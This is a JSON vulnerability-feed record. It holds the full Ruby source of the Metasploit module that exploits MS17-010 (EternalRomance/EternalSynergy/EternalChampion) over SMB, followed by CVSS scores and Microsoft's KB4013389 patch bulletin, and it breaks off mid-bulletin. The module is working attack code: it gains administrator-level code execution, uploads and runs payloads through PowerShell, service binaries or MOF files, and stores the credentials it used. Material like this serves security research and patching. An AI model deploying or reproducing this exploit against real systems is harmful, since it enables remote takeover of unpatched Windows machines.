"sourceHref": "https://www.exploit-db.com/download/43970/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n# Windows XP systems that are not part of a domain default to treating all\r\n# network logons as if they were Guest. This prevents SMB relay attacks from\r\n# gaining administrative access to these systems. This setting can be found\r\n# under:\r\n#\r\n# Local Security Settings >\r\n# Local Policies >\r\n# Security Options >\r\n# Network Access: Sharing and security model for local accounts\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::WbemExec\r\n include Msf::Auxiliary::Report\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',\r\n 'Description' => %q{\r\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\r\n primitive. This will then be used to overwrite the connection session information with as an\r\n Administrator session. From there, the normal psexec payload code execution is done.\r\n\r\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\r\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\r\n exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a\r\n named pipe.\r\n },\r\n 'Author' =>\r\n [\r\n 'sleepya', # zzz_exploit idea and offsets\r\n 'zerosum0x0',\r\n 'Shadow Brokers',\r\n 'Equation Group'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DefaultOptions' =>\r\n {\r\n 'WfsDelay' => 10,\r\n 'EXITFUNC' => 'thread'\r\n },\r\n 'References' =>\r\n [\r\n [ 'AKA', 'ETERNALSYNERGY' ],\r\n [ 'AKA', 'ETERNALROMANCE' ],\r\n [ 'AKA', 'ETERNALCHAMPION' ],\r\n [ 'AKA', 'ETERNALBLUE'], # does not use any CVE from Blue, but Search should show this, it is preferred\r\n [ 'MSB', 'MS17-010' ],\r\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\r\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\r\n [ 'CVE', '2017-0147'], # for EternalRomance reference\r\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\r\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\r\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 3072,\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'PowerShell', { } ],\r\n [ 'Native upload', { } ],\r\n [ 'MOF upload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share\", 'ADMIN$' ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\r\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\r\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\r\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\r\n ])\r\n end\r\n\r\n def exploit\r\n begin\r\n eternal_pwn(datastore['RHOST'])\r\n smb_pwn()\r\n\r\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\r\n print_error(\"#{e.message}\")\r\n rescue ::Errno::ECONNRESET,\r\n ::Rex::Proto::SMB::Exceptions::LoginError,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_error(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_error(error.class.to_s)\r\n print_error(error.message)\r\n print_error(error.backtrace.join(\"\\n\"))\r\n ensure\r\n eternal_cleanup() # restore session\r\n end\r\n end\r\n\r\n def smb_pwn()\r\n case target.name\r\n when 'Automatic'\r\n if powershell_installed?\r\n print_status('Selecting PowerShell target')\r\n powershell\r\n else\r\n print_status('Selecting native target')\r\n native_upload\r\n end\r\n when 'PowerShell'\r\n powershell\r\n when 'Native upload'\r\n native_upload\r\n when 'MOF upload'\r\n mof_upload\r\n end\r\n\r\n handler\r\n end\r\n\r\n\r\n # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to\r\n # be moved into a mixin\r\n\r\n def powershell_installed?\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\"\r\n\r\n case datastore['SHARE'].upcase\r\n when 'ADMIN$'\r\n path = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n when 'C$'\r\n path = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n else\r\n path = datastore['PSH_PATH']\r\n end\r\n\r\n simple.connect(share)\r\n\r\n vprint_status(\"Checking for #{path}\")\r\n\r\n if smb_file_exist?(path)\r\n vprint_status('PowerShell found')\r\n psh = true\r\n else\r\n vprint_status('PowerShell not found')\r\n psh = false\r\n end\r\n\r\n simple.disconnect(share)\r\n\r\n psh\r\n end\r\n\r\n def powershell\r\n ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']\r\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n\r\n if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']\r\n print_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\")\r\n end\r\n\r\n # Execute the powershell command\r\n print_status(\"Executing the payload...\")\r\n begin\r\n psexec(command)\r\n rescue StandardError => exec_command_error\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\")\r\n end\r\n end\r\n\r\n def native_upload\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)\r\n serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''\r\n\r\n # Upload the shellcode to a file\r\n print_status(\"Uploading payload...\")\r\n smbshare = datastore['SHARE']\r\n fileprefix = \"\"\r\n # if SHARE = Users/sasha/ or something like this\r\n if smbshare =~ /.[\\\\\\/]/\r\n subfolder = true\r\n smbshare = datastore['SHARE'].dup\r\n smbshare = smbshare.gsub(/^[\\\\\\/]/,\"\")\r\n folder_list = smbshare.split(/[\\\\\\/]/)\r\n smbshare = folder_list[0]\r\n fileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{fileprefix}\\\\#{filename}\", 'rwct')\r\n else\r\n subfolder = false\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{filename}\", 'rwct')\r\n end\r\n exe = ''\r\n opts = { :servicename => servicename, :serviceencoder => serviceencoder}\r\n begin\r\n exe = generate_payload_exe_service(opts)\r\n\r\n fd << exe\r\n ensure\r\n fd.close\r\n end\r\n\r\n if subfolder\r\n print_status(\"Created \\\\#{fileprefix}\\\\#{filename}...\")\r\n else\r\n print_status(\"Created \\\\#{filename}...\")\r\n end\r\n\r\n # Disconnect from the share\r\n simple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n\r\n # define the file location\r\n if datastore['SHARE'] == 'ADMIN$'\r\n file_location = \"%SYSTEMROOT%\\\\#{filename}\"\r\n elsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/\r\n file_location = datastore['SHARE'].slice(0,1) + \":\\\\#{filename}\"\r\n else\r\n file_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#{filename}\"\r\n end\r\n\r\n psexec(file_location, false)\r\n\r\n unless datastore['SERVICE_PERSIST']\r\n print_status(\"Deleting \\\\#{filename}...\")\r\n #This is not really useful but will prevent double \\\\ on the wire :)\r\n if datastore['SHARE'] =~ /.[\\\\\\/]/\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{fileprefix}\\\\#{filename}\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{fileprefix}\\\\#{filename} failed: #{e.message}\")\r\n end\r\n else\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{filename}\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{filename} failed: #{e.message}\")\r\n end\r\n end\r\n end\r\n end\r\n\r\n def mof_upload\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\"\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n\r\n # payload as exe\r\n print_status(\"Trying wbemexec...\")\r\n print_status(\"Uploading Payload...\")\r\n if datastore['SHARE'] != 'ADMIN$'\r\n print_error('Wbem will only work with ADMIN$ share')\r\n return\r\n end\r\n simple.connect(share)\r\n exe = generate_payload_exe\r\n fd = smb_open(\"\\\\system32\\\\#{filename}\", 'rwct')\r\n fd << exe\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\#{filename}\")\r\n\r\n # mof to cause execution of above\r\n mofname = rand_text_alphanumeric(14) + \".MOF\"\r\n mof = generate_mof(mofname, filename)\r\n print_status(\"Uploading MOF...\")\r\n fd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct')\r\n fd << mof\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\")\r\n\r\n # Disconnect from the ADMIN$\r\n simple.disconnect(share)\r\n end\r\n\r\n def report_auth\r\n service_data = {\r\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\r\n port: datastore['RPORT'],\r\n service_name: 'smb',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: self.fullname,\r\n private_data: datastore['SMBPass'],\r\n username: datastore['SMBUser'].downcase\r\n }\r\n\r\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\r\n credential_data.merge!({\r\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\r\n realm_value: datastore['SMBDomain']\r\n })\r\n end\r\n\r\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\r\n credential_data.merge!({:private_type => :ntlm_hash})\r\n else\r\n credential_data.merge!({:private_type => :password})\r\n end\r\n\r\n credential_data.merge!(service_data)\r\n\r\n credential_core = create_credential(credential_data)\r\n\r\n login_data = {\r\n access_level: 'Admin',\r\n core: credential_core,\r\n last_attempted_at: DateTime.now,\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL\r\n }\r\n\r\n login_data.merge!(service_data)\r\n create_credential_login(login_data)\r\n end\r\nend", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "e6f53676ca888a6a837a24417efa2477"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "78e989de00446befd491b80d94f241f6"}, {"key": "href", "hash": "ced5a2b3b6df6c4dae430e5843571b2e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "eaa4ed87336e2e51d149ce6e262dadbe"}, {"key": "published", "hash": "eaa4ed87336e2e51d149ce6e262dadbe"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e53848d9c7e659c4bd32f7af7ff99515"}, {"key": "title", "hash": "2882fa4f749f1c5065df21f921150959"}, {"key": "type", "hash": "916b5dbd201b469998d9b4a4c8bc4e08"}], "scheme": null}], "mskb": [{"id": "KB4013389", "hash": "f19980cc75a4f673cb3f8f550cf4b644c08430201b0e2682e360bf35a84f9788", "type": "mskb", "bulletinFamily": "microsoft", "title": "MS17-010: Security update for Windows SMB Server: March 14, 2017", "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. </div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. </div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>indows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a></p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a 